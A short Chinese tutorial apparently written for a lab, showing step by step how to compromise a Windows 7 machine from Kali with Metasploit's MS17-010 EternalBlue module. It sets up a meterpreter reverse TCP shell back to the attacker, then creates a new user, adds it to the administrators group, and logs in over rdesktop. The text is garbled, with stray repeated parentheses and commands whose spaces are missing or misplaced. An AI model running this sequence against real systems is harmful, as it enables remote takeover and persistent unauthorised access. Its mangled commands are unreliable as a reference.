一、打开kali和win7查看IP。
(1)以Windows7为靶机
IP:192.168.43.109
(2)作为攻击机的Kali (最新版kaili ) )。
IP:192.168.43.49
二、打开kali进入终端,输入nmap IP确认靶机是否打开445端口。
三、在kali中输入MSF控制台()等一会儿可能会慢一点) ) ) ) )。
四、进入后,进入search ms17-010 (搜索素材攻击模块) ) ) ) ) ) ) ) )。
五.找到exploit windows/SMB/ms17 _ 010 _ eternal blue,
运行useexploitwindows/SMB/ms17 _ 010 _ eternal blue
使用显示选项或选项显示选项设置
可以使用show targets显示可攻击系统的版本
可以使用show payloads加载所有可用的攻击向量
六、输入show options显示和配置RHOST (靶机)和LHOST (操作机)
七.设置TCP连接setpayloadwindows/x64/meter preter/reverse _ TCP
八. run或exploit攻击
九.进入类似目标机的终端
十、可以创建用户netuserxxxx1234/add(xxxx用户名1234密码)
十一、netlocalgroupadministratorsxxx/add (将用户设置为管理员权限)。
十二.重新打开一个终端rdesktop IP